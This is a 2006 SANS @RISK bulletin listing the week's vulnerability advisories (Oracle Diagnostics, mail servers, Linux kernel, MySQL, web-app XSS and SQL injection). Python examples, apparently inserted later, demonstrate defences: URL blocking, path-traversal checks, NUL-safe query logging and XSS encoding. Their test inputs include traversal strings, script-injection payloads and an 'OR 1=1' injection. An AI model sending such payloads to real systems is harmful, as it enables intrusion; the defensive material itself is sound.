
@RISK: The Consensus Security Vulnerability Alert

Volume: V, Issue: 9
March 6, 2006

Apple patched several critical vulnerabilities in its Safari browser and fixed other security problems in Mac OS X. And Oracle is recommending its new patch be applied now.

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

    Category                                  # of Updates & Vulnerabilities
    Other Microsoft Products                  1
    Third Party Windows Apps                  11
    Mac Os                                    1 (Critical)
    Linux                                     7
    BSD                                       1
    Solaris                                   1
    Unix                                      1
    Cross Platform                            14
    Web Application - Cross Site Scripting    16
    Web Application - SQL Injection           14
    Web Application                           21
    Network Device                            4

************************ Sponsored by Sourcefire ************************

Sourcefire, the creator of Snort, is offering the Open Source Snort community two comprehensive courses: "Snort: Building and Operating" and "Snort Rules."

Purchase both Snort courses either as an instructor-led or 60-day online training bundle and receive a FREE Snort Certified Professional exam (save $395).

For more information: http://www.sourcefire.com/services/training_schedule.html http://www.snort.org/training

Contact traininglist@sourcefire.com or 800.501.6008.

*************************************************************************

Upcoming Security Training in Monterey, San Diego and Washington DC

As you can see at www.sans.org, more and more SANS classes are sold out (the red triangles) so we have begun a policy of earlier posting of new conferences. If you are thinking about turbo charging your security career or the careers of any of your coworkers this spring, start planning now to go to San Diego in early May. You'll find more than a dozen of SANS most popular courses and a vendor exposition, right on the harbor in San Diego. http://www.sans.org/security06/

Or plan to come to Washington in July, right after July 4, for the biggest SANS Fire ever: all 17 SANS immersion tracks and more than a dozen special courses, a big exposition, and an inside look at how the Internet's Early Warning System (Internet Storm Center) actually works. Bring your family for the national fireworks show. http://www.sans.org/sansfire06

*************************************************************************

Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Other Microsoft Products
Third Party Windows Apps
Mac Os
Linux
BSD
Solaris
Unix
Cross Platform
Web Application - Cross Site Scripting
Web Application - SQL Injection
Web Application
Network Device

********************* Sponsored Links: **********************************

1) Free WhatWorks Webcast this week - What Works in Intrusion Prevention: Sheltering Networks with The Red Cross Tuesday, March 07 at 1:00 PM EST (1800 UTC/GMT) http://www.sans.org/info.php?id=1050

2) Prepare for the June 10, 2006 CISA® Certification examination! The SANS® +S Training for the CISA® Certification Exam course has been specifically written to help prepare for and to pass the CISA® exam while ensuring that the information presented is practical and applicable in daily life.

New SANS@Home session led by James Tarala starts March 23.

See http://www.sans.org/info.php?id=1051

*************************************************************************

PART I Critical Vulnerabilities

Part I for this issue has been compiled by Rohit Dhamankar and Rob King at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (2) HIGH: Oracle E-Business Suite Diagnostics Pack Vulnerabilities
  • Affected:
    • Oracle E-business Suite Diagnostics
  • Description: Oracle has released a security update for the Oracle E-Business Suite Diagnostics package; the fix will also be included in the next Critical Patch Update, due in April 2006. The Diagnostics package allows an Oracle E-Business Suite administrator to run various tests of the suite's configuration and operation. Some of the Diagnostics web pages can be reached without any authentication, and some contain SQL injection vulnerabilities. The technical details required to exploit these flaws have not been posted. Note that the "HIGH" rating is based on the fact that Oracle is advising customers to apply this patch now rather than wait for the quarterly update.

  • Status: Apply the patch released for the Diagnostics package. A workaround is to block access to URLs that begin with "/OA_HTML/jtfqa" from the Internet using a firewall or an IPS.

  • Council Site Actions: Only one of the reporting council sites is using the affected software. They are still reviewing the vulnerability alert and will most likely wait until the next Oracle quarterly update to patch their systems.

  • References:
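The workaround above is a URL-prefix block at a firewall or IPS. A naive string match is easy to slip past with percent-encoding, "/./" and "/../" segments, backslashes or doubled slashes, so the request path has to be canonicalised before the prefix is compared. The following is an added example written for this bulletin, not Oracle's or any vendor's filter code: it normalises an HTTP request-target and applies the "/OA_HTML/jtfqa" prefix rule from the advisory. Matching case-insensitively is an assumption chosen to be conservative at the edge, since whether the application server treats paths case-insensitively depends on the platform it runs on.

```python
import posixpath
from urllib.parse import unquote

# Request-path prefix named in the advisory's workaround.
BLOCKED_PREFIXES = ("/OA_HTML/jtfqa",)


def normalize_request_path(raw_target: str, decode_rounds: int = 2) -> str:
    """Canonicalise an HTTP request-target so a prefix rule cannot be
    side-stepped with encoding or path tricks.

    Drops the query string and fragment, percent-decodes repeatedly
    (catches %252e-style double encoding), treats backslashes as
    separators, and collapses '.', '..' and repeated slashes.
    """
    path = raw_target.split("#", 1)[0].split("?", 1)[0]
    for _ in range(decode_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/")
    if not path.startswith("/"):
        path = "/" + path
    path = posixpath.normpath(path)
    # normpath resolves '..' and '/./' but deliberately keeps a leading
    # '//' intact; squash it so '//OA_HTML/...' matches '/OA_HTML/...'.
    while path.startswith("//"):
        path = path[1:]
    return path


def is_blocked(raw_target: str, case_insensitive: bool = True) -> bool:
    """True when an edge device should refuse the request.

    Assumption (not from the advisory): match case-insensitively, the
    conservative choice when the backend's path handling is unknown.
    """
    path = normalize_request_path(raw_target)
    if "\x00" in path:
        return True  # embedded NUL: refuse rather than guess how the backend parses it
    haystack = path.lower() if case_insensitive else path
    for prefix in BLOCKED_PREFIXES:
        needle = prefix.lower() if case_insensitive else prefix
        if haystack == needle or haystack.startswith(needle):
            return True
    return False


if __name__ == "__main__":
    for target in ("/OA_HTML/jtfqaSomething.jsp", "/OA_HTML/x/..%2fjtfqa",
                   "/OA_HTML/AppsLogin"):
        print(f"{target:40} -> {'BLOCK' if is_blocked(target) else 'allow'}")
```

The decode loop stops as soon as a round changes nothing, so a literal "%25" in a legitimate path is not over-decoded, while a double-encoded traversal still collapses. Whatever the edge device does, the rule should be applied to the same canonical form the application will see; if the IPS decodes differently from the server, the prefix match is only as good as the weaker of the two.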
Exploit Code
  • (3) Internet Explorer IsComponentInstalled Overflow
  • Description: Microsoft Internet Explorer contains a stack-based buffer overflow in the "IsComponentInstalled" function. The overflow has reportedly been fixed in Windows 2000 SP4 and Windows XP SP1. Exploit code has been included in the Metasploit project.

  • References:
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 9, 2006

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 4922 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.


  • 06.9.1 - CVE: Not Available
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer IsComponentInstalled Buffer Overflow
  • Description: Microsoft Internet Explorer supports the "IsComponentInstalled()" method to report if a particular component is installed. It is prone to a buffer overflow condition due to insufficient bounds checking on the "sID" argument. This issue was reportedly addressed in Windows 2000 SP4 and Windows XP SP1, however this has not been confirmed. Internet Explorer 6 is vulnerable to this issue; earlier versions may also be affected.
  • Ref: http://www.securityfocus.com/bid/16870

  • 06.9.2 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: DirectContact Directory Traversal
  • Description: DirectContact is a web server for Windows platforms. DirectContact is prone to a directory traversal vulnerability. The problem occurs with specially crafted HTTP GET requests containing directory traversal strings. DirectContact 0.3b is reportedly vulnerable.
  • Ref: http://www.securityfocus.com/bid/16849

  • 06.9.3 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Alt-N MDaemon IMAP Server Remote Format String
  • Description: Alt-N MDaemon is a Microsoft Windows-based mail server product. It is affected by a remote format string vulnerability due to improper sanitization of user-supplied input prior to its use in the format-specifier argument to a formatted printing function. This issue presents itself when an attacker submits format specification sequences through the folder name argument of the IMAP "CREATE" and "LIST" commands. Alt-N MDaemon 8.1.1 is reported to be vulnerable; other versions are likely affected as well.
  • Ref: http://www.securityfocus.com/bid/16854/exploit

  • 06.9.4 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: ArGoSoft Mail Server Pro IMAP Server Directory Traversal
  • Description: ArGoSoft Mail Server Pro is a mail server application. It is vulnerable to a directory traversal issue due to insufficient sanitization of user input to the IMAP "RENAME" command. ArGoSoft Mail Server Pro version 1.8.8.1 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/425969

  • 06.9.5 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Multiple SpeedProject Applications Remote Directory Traversal
  • Description: This issue affects SpeedCommander, ZipStar and Squeez. These applications are archiving and compression applications for Microsoft Windows. The applications are reported prone to a vulnerability that may allow an attacker to place files and overwrite files in arbitrary locations on a vulnerable computer. Speedproject ZipStar 5.1, Speedproject Squeez 5.1 and Speedproject SpeedCommander 11.0 Build 4450 are affected.
  • Ref: http://www.securityfocus.com/bid/16807/exploit
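Entries 06.9.2, 06.9.4 and 06.9.5 are all the same defect: a name supplied by the remote side (an HTTP GET path, an IMAP RENAME mailbox name, an archive entry name) is joined onto a base directory without checking that the result still lies inside it. The check below is an added example for this bulletin, not code from DirectContact, ArGoSoft or SpeedProject: it canonicalises the untrusted component lexically and refuses anything that escapes the root. The sample roots and names are constructed.

```python
import posixpath
from urllib.parse import unquote


class TraversalError(ValueError):
    """Raised when an untrusted path would leave its root directory."""


def resolve_under_root(root: str, untrusted: str, decode_rounds: int = 2) -> str:
    """Map an attacker-controlled relative path onto a fixed root and
    return the canonical absolute path, or raise TraversalError.

    The same routine serves an HTTP GET target, an IMAP mailbox name
    given to RENAME, or an entry name read out of an archive: the
    caller hands in the untrusted string and only ever writes to or
    reads from the returned path.
    """
    if "\x00" in untrusted:
        raise TraversalError("embedded NUL byte")
    path = untrusted
    for _ in range(decode_rounds):          # undo %2e%2e and %252e%252e
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/")          # Windows separators count as separators
    path = path.lstrip("/")                 # an absolute name must not replace the root
    root_norm = posixpath.normpath("/" + root.strip("/"))
    candidate = posixpath.normpath(posixpath.join(root_norm, path))
    if candidate != root_norm and not candidate.startswith(root_norm + "/"):
        raise TraversalError(f"{untrusted!r} escapes {root_norm}")
    return candidate


def is_safe(root: str, untrusted: str) -> bool:
    """Convenience wrapper: True if the name stays inside root."""
    try:
        resolve_under_root(root, untrusted)
        return True
    except TraversalError:
        return False


if __name__ == "__main__":
    # Constructed inputs: one web root, one per-user mail store.
    for root, name in (("/srv/www", "docs/index.html"),
                       ("/srv/www", "../../etc/passwd"),
                       ("/srv/www", "..%5c..%5cboot.ini"),
                       ("/var/mail/alice", "INBOX.Sent"),
                       ("/var/mail/alice", "../bob/INBOX")):
        print(f"{root:18} {name!r:26} -> {'ok' if is_safe(root, name) else 'REJECT'}")
```

This is a lexical check: it settles "..", encoding and separator games, which is what the three advisories describe. On a real filesystem the returned path should additionally be passed through os.path.realpath and re-checked against the root, so a symbolic link already inside the root cannot point out of it.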

  • 06.9.6 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: ArGoSoft Mail Server Pro Multiple HTML Injection
  • Description: ArGoSoft Mail Server is an SMTP, POP3 and Finger server. Insufficient sanitization of email headers such as "subject" and "from" exposes the application to an HTML injection issue. ArGoSoft Mail Server Pro 1.8.8.5 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/16834

  • 06.9.7 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: MTS Professional Open EMail Relay
  • Description: MTS Professional is an SMTP/POP3 email server for the Microsoft Windows platform. It is susceptible to a remote open-email-relay vulnerability. This issue is due to a failure in the application to properly verify the source of mail before forwarding it.
  • Ref: http://www.securityfocus.com/bid/16840

  • 06.9.8 - CVE: CVE-2006-0814
  • Platform: Third Party Windows Apps
  • Title: lighttpd Information Disclosure
  • Description: lighttpd is a web server. It is affected by an information disclosure issue due to insufficient sanitization of the GET request. lighttpd versions prior to 1.4.10a for Windows are affected.
  • Ref: http://www.securityfocus.com/bid/16893

  • 06.9.9 - CVE: CVE-2006-0815
  • Platform: Third Party Windows Apps
  • Title: NetworkActiv Web Server Remote Script Disclosure
  • Description: NetworkActiv Web Server is vulnerable to an information disclosure issue because the application fails to properly validate file extensions in an HTTP GET request. NetworkActiv Web Server versions 3.5.15 and earlier are vulnerable.
  • Ref: http://secunia.com/secunia_research/2006-10/advisory/

  • 06.9.10 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: LetterMerger Local Information Disclosure
  • Description: LetterMerger is an alternative to the Microsoft Word mail merge tool. It is prone to a local information disclosure vulnerability. The issue exists because the application stores data with insecure permissions in a Microsoft Access database. LetterMerger version 1.2 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/16917

  • 06.9.11 - CVE: CVE-2006-0949
  • Platform: Third Party Windows Apps
  • Title: RaidenHTTPD Remote Script Disclosure
  • Description: RaidenHTTPD is a web server. It is vulnerable to an information disclosure issue when the application fails to properly validate file extensions in an HTTP GET request. RaidenHTTPD versions 1.1.47 and earlier are vulnerable.
  • Ref: http://secunia.com/secunia_research/2006-15/advisory/

  • 06.9.12 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Van Dyke SecureCRT and SecureFX Buffer Overflow
  • Description: Van Dyke Software SecureCRT is a Secure Shell (SSH) client and SecureFX is a secure file transfer client. They are vulnerable to a buffer overflow issue when Unicode strings are converted to narrow strings. Van Dyke Software SecureCRT versions 5.0.4 and earlier are vulnerable. SecureFX versions 3.0.4 and earlier are vulnerable.
  • Ref: http://www.vandyke.com/products/securefx/history.txt http://www.vandyke.com/products/securecrt/history.txt

  • 06.9.13 - CVE: CVE-2005-2713, CVE-2005-2714
  • Platform: Mac Os
  • Title: Apple Mac OS X Directory Services Passwd Privilege Escalation
  • Description: Apple Mac OS X Directory Services implements the "passwd" utility to allow users to change their passwords. It is affected by two issues that can result in privilege escalation. These issues were originally described in Apple Mac OS X Security Update 2006-001.
  • Ref: http://www.securityfocus.com/bid/16910

  • 06.9.14 - CVE: CVE-2005-3847
  • Platform: Linux
  • Title: Linux Kernel handle_stop_signal Denial of Service
  • Description: Linux kernel is prone to a denial of service vulnerability caused by a race condition. The issue resides in the "handle_stop_signal()" function in "signal.c". It arises when a core dump is triggered in one thread while another thread has a pending SIGKILL.
  • Ref: http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=dd12f48d4e8774415b528d3991ae47c28f26e1ac;hp=ade6648b3b11a5d81f6f28135193ab6d85d621db

  • 06.9.15 - CVE: CVE-2006-0040
  • Platform: Linux
  • Title: GNOME Evolution Denial of Service
  • Description: Evolution is an email client for the GNOME desktop. It is vulnerable to a remote denial of service issue due to a failure in the application to properly handle incoming emails containing a large number of URIs and other formatting elements. The issue is compounded when the application is restarted, because it will attempt to process the same malicious email again. GNOME Evolution versions 2.3.7 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/16899

  • 06.9.16 - CVE: Not Available
  • Platform: Linux
  • Title: IRSSI DCC ACCEPT Denial of Service
  • Description: IRSSI is an Internet Relay Chat (IRC) client. It is vulnerable to a remote denial of service issue because the DCC ACCEPT command handler does not verify remotely specified arguments. IRSSI versions 0.8.9 and 0.8.10rc5 are vulnerable.
  • Ref: http://www.securityfocus.com/bid/16913

  • 06.9.17 - CVE: CVE-2006-0554
  • Platform: Linux
  • Title: Linux Kernel XFS File System Local Information Disclosure
  • Description: The Linux kernel contains support for the XFS filesystem by SGI. It is susceptible to a local information disclosure issue due to a flaw in the filesystem that may result in previously written data being returned to local users. This issue arises when certain "ftruncate()" activity triggers a flaw that may result in data extents being exposed to local users where holes should be. Linux kernel versions prior to 2.6.15.5 are affected.
  • Ref: http://www.securityfocus.com/bid/16844

  • 06.9.18 - CVE: CVE-2006-0555
  • Platform: Linux
  • Title: Linux Kernel NFS Client Denial of Service
  • Description: Linux kernel NFS client is prone to a local denial of service vulnerability. This issue is due to improper handling of the direct I/O with excessive O_DIRECT data. For more information on affected versions, please follow the reference link.
  • Ref: http://www.securityfocus.com/bid/16922

  • 06.9.19 - CVE: Not Available
  • Platform: Linux
  • Title: Linux Kernel sys_mbind System Call Local Denial of Service
  • Description: The Linux kernel "sys_mbind" system call is vulnerable to a local denial of service issue due to insufficient sanitization in the system call's arguments. Linux kernel versions 2.6.15.4 and earlier are vulnerable.
  • Ref: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.15.5

  • 06.9.20 - CVE: CVE-2006-0741
  • Platform: Linux
  • Title: Linux Kernel ELF File Entry Point Denial of Service
  • Description: Linux kernel is vulnerable to a denial of service when opening malformed ELF files with a bad entry address. Intel EM64T processors running Linux kernel versions 2.6.15.4 and earlier are vulnerable.
  • Ref: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.15.5

  • 06.9.21 - CVE: Not Available
  • Platform: BSD
  • Title: FreeBSD Remote NFS Mount Request Denial of Service
  • Description: FreeBSD is susceptible to a remote denial of service vulnerability. This issue is due to a flaw in affected kernels that potentially results in a crash when handling malformed NFS mount requests.
  • Ref: http://www.securityfocus.com/bid/16838/exploit

  • 06.9.22 - CVE: Not Available
  • Platform: Solaris
  • Title: Sun Solaris HSFS Filesystem Local Denial of Service
  • Description: Sun Solaris is prone to a local denial of service issue that affects multiple locations of the "hsfs" module. A local unprivileged attacker can cause a system panic.
  • Ref: http://www.securityfocus.com/bid/16816

  • 06.9.23 - CVE: CVE-2006-0912
  • Platform: Unix
  • Title: Oreka RTP Packet Handling Remote Denial of Service
  • Description: Oreka is a freely available, open-source audio recording application. Oreka is susceptible to a remote denial of service vulnerability. This issue is due to the application's failure to properly handle unspecified sequences of RTP packets. Oreka versions prior to 0.5 are affected by this issue.
  • Ref: http://oreka.sourceforge.net/about/news?id=2006-02-16/0.5-release

  • 06.9.24 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Oracle Diagnostics Multiple Vulnerabilities
  • Description: The Oracle Diagnostics module (IZU) is a troubleshooting feature of the Oracle E-Business Suite 11i. It is affected by multiple vulnerabilities including SQL injection. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/16844

  • 06.9.25 - CVE: Not Available
  • Platform: Cross Platform
  • Title: MySQL Query Logging Bypass
  • Description: MySQL is susceptible to a query logging bypass vulnerability. This issue is due to a discrepancy between the handling of NULL bytes in input data in the "mysql_real_query()" function, and the query logging functionality. If an attacker issues queries against a vulnerable database with query logging enabled, they can include NULL bytes in order to truncate the query in the log. MySQL version 5.0.18 is affected.
  • Ref: http://www.securityfocus.com/bid/16850
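The MySQL entry above is a classic mismatch between two representations of the same buffer: the execution path takes a pointer and a length, the logging path treats the buffer as a NUL-terminated C string, so a single NUL byte makes the log record stop while the statement keeps going. The model below is an added example for this bulletin, not MySQL source: it runs the same constructed statement through a naive logger and a length-aware logger that renders NUL and other non-printable bytes visibly. Placing the NUL inside a comment is a construction for the example; the bulletin only states that NUL bytes truncate the logged query.

```python
def c_string(data: bytes) -> bytes:
    """What a C function handed a char* sees: bytes up to the first NUL."""
    nul = data.find(b"\x00")
    return data if nul < 0 else data[:nul]


def escape_for_log(query: bytes) -> str:
    """Length-aware, lossless rendering for a text log: printable ASCII
    is kept, NUL becomes '\\0', everything else becomes '\\xNN'."""
    out = []
    for b in query:
        if b == 0:
            out.append("\\0")
        elif 32 <= b < 127:
            out.append(chr(b))
        else:
            out.append(f"\\x{b:02x}")
    return "".join(out)


class QueryLog:
    """Tiny model of a server-side general query log.

    nul_safe=False reproduces the flaw: the engine parses the whole
    (pointer, length) buffer, the logger writes a C string.
    nul_safe=True logs the full buffer with non-printables escaped.
    """

    def __init__(self, nul_safe: bool):
        self.nul_safe = nul_safe
        self.entries = []    # what an administrator reads later
        self.executed = []   # what the engine actually parsed

    def run(self, query: bytes) -> str:
        self.executed.append(query)
        if self.nul_safe:
            entry = escape_for_log(query)
        else:
            entry = c_string(query).decode("latin-1")
        self.entries.append(entry)
        return entry

    def truncated_entries(self):
        """Indices of statements whose log entry does not account for
        every byte that was executed."""
        return [i for i, (q, e) in enumerate(zip(self.executed, self.entries))
                if escape_for_log(q) != e]


if __name__ == "__main__":
    # Constructed statement: the real predicate hides behind a NUL inside a comment.
    stmt = b"SELECT name FROM users WHERE id=1 /*\x00*/ OR 1=1"
    for safe in (False, True):
        log = QueryLog(nul_safe=safe)
        print(f"nul_safe={safe!s:5} logged: {log.run(stmt)!r}")
```

The same discrepancy shows up wherever a length-prefixed protocol is bridged into C-string APIs (syslog, audit hooks, IDS signatures keyed on the "end" of a statement). The practical check for a logging or proxy component is the one truncated_entries() performs: round-trip every byte that reached the parser into the record, and escape rather than drop what the text format cannot carry.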

  • 06.9.26 - CVE: Not Available
  • Platform: Cross Platform
  • Title: phpRPC Library Remote Code Execution
  • Description: phpRPC is an xmlrpc library that uses database and rpc-protocol abstraction. It is prone to a remote code execution vulnerability because the "decode()" function within the "rpc_decoder.php" script fails to adequately sanitize user-supplied input before processing it in an "eval()" call. Successful exploitation would result in arbitrary code execution in the context of the application. PHP scripts that implement the phpRPC library, such as RunCMS, may also be affected by this issue.
  • Ref: http://www.securityfocus.com/bid/16833

  • 06.9.27 - CVE: Not Available
  • Platform: Cross Platform
  • Title: PHP Multiple Security Bypass Vulnerabilities
  • Description: PHP is prone to multiple input validation vulnerabilities. These issues could allow an attacker to bypass the "safe_mode" and "open_basedir" security settings to obtain sensitive information. The first issue exists because the "mb_send_mail()" function does not properly validate user-supplied input to the "additional_parameter" parameter. The second issue occurs because various PHP IMAP functions do not properly validate user-supplied input. The IMAP vulnerabilities exist in PHP version 4.4.2 compiled with c_client 2004g; other versions may also be affected.
  • Ref: http://www.securityfocus.com/bid/16878/exploit

  • 06.9.28 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Mozilla Thunderbird Multiple Remote Information Disclosure Vulnerabilities
  • Description: Mozilla Thunderbird is susceptible to multiple remote information disclosure vulnerabilities. These issues are due to a failure of the application to properly enforce the restriction for downloading remote content in email messages. These issues allow remote attackers to gain access to potentially sensitive information, aiding them in further attacks. Mozilla Thunderbird version 1.5 is vulnerable to these issues.
  • Ref: http://www.securityfocus.com/archive/1/426347

  • 06.9.29 - CVE: CVE-2006-0677
  • Platform: Cross Platform
  • Title: CrossFire Denial of Service
  • Description: CrossFire is a multiplayer role playing game for multiple operating systems. It is prone to a remote denial of service vulnerability due to a design error in the application. By turning on the "oldsocketmode" option in the application, and then sending an overly large request, an attacker can exploit this issue. Crossfire version 1.8 is reported to be vulnerable.
  • Ref: http://aluigi.altervista.org/poc.htm

  • 06.9.30 - CVE: CVE-2006-0803
  • Platform: Cross Platform
  • Title: SuSE YaST Online Update Script Signature Verification Bypass
  • Description: SuSE YaST Online Update (YOU) is a software update utility that facilitates the installation of software updates from an online repository. The YaST Online Update is affected by a design error that could allow malicious scripts to bypass signature verification.
  • Ref: http://www.securityfocus.com/bid/16889

  • 06.9.31 - CVE: CVE-2006-0883
  • Platform: Cross Platform
  • Title: OpenSSH Remote PAM Denial of Service
  • Description: OpenSSH is susceptible to a remote denial of service vulnerability. This issue arises when OpenSSH is configured with privilege separation enabled and is also configured to use OpenPAM for authentication. In this configuration, OpenSSH forks an unprivileged process to handle the incoming connection and another process to interact with the PAM authentication system. If the unprivileged process handling the connection terminates while PAM authentication is underway, the OpenSSH master process mistakenly counts the orphaned PAM child processes in its connection accounting code. If an attacker causes many connections to be counted in this manner, the OpenSSH master process will believe it is overloaded and will stop accepting new connections. OpenSSH used together with OpenPAM on FreeBSD versions 5.3 and 5.4 is affected by this issue. Other operating systems and versions may also be affected.
  • Ref: http://www.securityfocus.com/bid/16892

  • 06.9.32 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Flex Multiple Unspecified Vulnerabilities
  • Description: GNU Flex is a tool for generating lexical analyzers. It is vulnerable to multiple unspecified security issues. GNU Flex versions 2.5.32 and 2.5.30 are vulnerable.
  • Ref: http://secunia.com/advisories/19071/

  • 06.9.33 - CVE: Not Available
  • Platform: Cross Platform
  • Title: NCP Secure Client Multiple Vulnerabilities
  • Description: NCP Secure Client is a commercial VPN and firewall application that is available for multiple platforms including Microsoft Windows and Linux. It is susceptible to multiple vulnerabilities. NCP Secure Client version 8.11 Build 146 on Microsoft Windows is vulnerable to these issues; other versions may also be affected.
  • Ref: http://www.securityfocus.com/bid/16906

  • 06.9.34 - CVE: Not Available
  • Platform: Cross Platform
  • Title: IBM WebSphere Application Server JSP Source Code Disclosure
  • Description: IBM WebSphere Application Server is prone to a source code disclosure vulnerability. An attacker can exploit this issue by supplying malformed HTTP requests to the server to disclose JSP source code. This issue allows remote attackers to gain access to the contents of potentially sensitive JSP source pages, aiding them in further attacks. Versions 5.0.2 and 5.1.1 of the software are vulnerable.
  • Ref: http://www-1.ibm.com/support/docview.wss?uid=swg21231377

  • 06.9.35 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Apache mod_python FileSession Code Execution
  • Description: Apache's mod_python is a module which allows the web server to interpret Python scripts. Apache mod_python is prone to a code execution vulnerability. Reports indicate that this issue affects the FileSession object of mod_python. It should be noted that this issue only affects mod_python version 3.2.7 and only arises if FileSession has been enabled, which is not enabled by default.
  • Ref: http://www.cgisecurity.com/2006/02/07

  • 06.9.36 - CVE: Not Available
  • Platform: Cross Platform
  • Title: STLPort Library Multiple Buffer Overflow Vulnerabilities
  • Description: STLport is a freely available, open source C++ Standard Template Library (STL). The STLport library is susceptible to multiple buffer overflow vulnerabilities. These issues are due to improper boundary checking of user-supplied input prior to copying it into insufficiently sized memory buffers. The first issues are due to several incorrectly bounded uses of the "strcpy()" function in the "src/c_locale_glibc/c_locale_glibc2.c" source file. STLport versions prior to 5.0.2 are affected by these issues.
  • Ref: http://www.securityfocus.com/bid/16928

  • 06.9.37 - CVE: Not Available
  • Platform: Cross Platform
  • Title: EMC Dantz Retrospect Backup Client Remote Denial of Service
  • Description: Dantz Retrospect Backup client is a network backup client for Windows and Apple OS X platforms. It is affected by a remote denial of service if it receives malformed data on TCP port 497. This issue has been addressed in Retrospect Backup Client 6.5.138 and 7.0.109.
  • Ref: http://www.securityfocus.com/bid/16933

  • 06.9.38 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Cactusoft Parodia Agencyprofile.ASP Cross-Site Scripting
  • Description: Parodia is a web-based job board application. It is prone to a cross-site scripting vulnerability due to improper sanitization of user-supplied input to the "AG_ID" parameter of the "agencyprofile.asp" script. CactuSoft Parodia version 6.2 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/16865
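The cross-site scripting entries in this section, and the HTML injection in ArGoSoft's mail headers (06.9.6), share one root cause: a value the attacker controls is copied into a page without encoding for the context it lands in. The snippet below is an added example for this bulletin, not Parodia's ASP code or any other listed product's: it takes the "AG_ID" parameter named in the entry, renders it once by concatenation and once with per-context encoding, so the difference between the HTML-text, attribute and URL contexts is visible. The surrounding markup and the payloads are constructed.

```python
import html
from urllib.parse import quote


def render_profile_vulnerable(ag_id: str) -> str:
    """The finding's pattern: the query-string value is echoed raw into
    both a text node and an href attribute."""
    return (f'<h1>Agency {ag_id}</h1>'
            f'<a href="agencyprofile.asp?AG_ID={ag_id}">permalink</a>')


def render_profile_safe(ag_id: str) -> str:
    """Encode for each output context separately.

    html.escape(quote=True) covers text nodes and quoted attribute values
    (&, <, >, ", '). A value going into a URL query component is
    percent-encoded instead, so it can neither break out of the quotes
    nor smuggle a second parameter or a javascript: scheme.
    """
    text_ctx = html.escape(ag_id, quote=True)
    url_ctx = quote(ag_id, safe="")
    return (f'<h1>Agency {text_ctx}</h1>'
            f'<a href="agencyprofile.asp?AG_ID={url_ctx}">permalink</a>')


def contains_raw_markup(rendered: str, marker: str = "<script") -> bool:
    """Cheap response-side check: does the page contain the marker as
    live markup rather than as an encoded entity?"""
    return marker.lower() in rendered.lower()


if __name__ == "__main__":
    # Constructed payloads: one closes the attribute, one injects an event handler.
    for payload in ('"><script>alert(1)</script>', '" onmouseover="alert(1)'):
        print("vulnerable:", render_profile_vulnerable(payload))
        print("safe:      ", render_profile_safe(payload))
```

Encoding on output is the fix that survives new parameters and new payloads; stripping "<script" from input does not, because an attribute-breakout payload like the second one never contains that string. The same two encoders apply to a webmail client showing a message's Subject or From header.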

  • 06.9.39 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: CGI Calendar Multiple Cross-Site Scripting Vulnerabilities
  • Description: CGI Calendar is a freely available online calendar application. It is prone to multiple cross-site scripting vulnerabilities due to insufficient sanitization of user-supplied input to various scripts. CGI Calendar version 2.7 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/16859

  • 06.9.40 - CVE: CVE-2006-0889
  • Platform: Web Application - Cross Site Scripting
  • Title: Calcium EventText Cross-Site Scripting
  • Description: Calcium is a web-based calendar application for any platform that supports Perl CGI scripts. Calcium is prone to a cross-site scripting vulnerability. Calcium version 3.10.1 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/16851

  • 06.9.41 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: QwikiWiki Index.PHP Cross-Site Scripting
  • Description: QwikiWiki is a web-based wiki application implemented in PHP. It is prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input to the "page" parameter of the "index.php" script. QwikiWiki version 1.4 is affected.
  • Ref: http://www.securityfocus.com/bid/16874

  • 06.9.42 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: MyPHPNuke Multiple Cross-Site Scripting Vulnerabilities
  • Description: MyPHPNuke is a web-based content management system written in PHP. It is prone to multiple cross-site scripting vulnerabilities due to insufficient sanitization of user-supplied input to the "letter" parameter of the "reviews.php" script, and the "category" parameter of the "download.php" script. myPHPNuke version 1.8.8 is vulnerable.
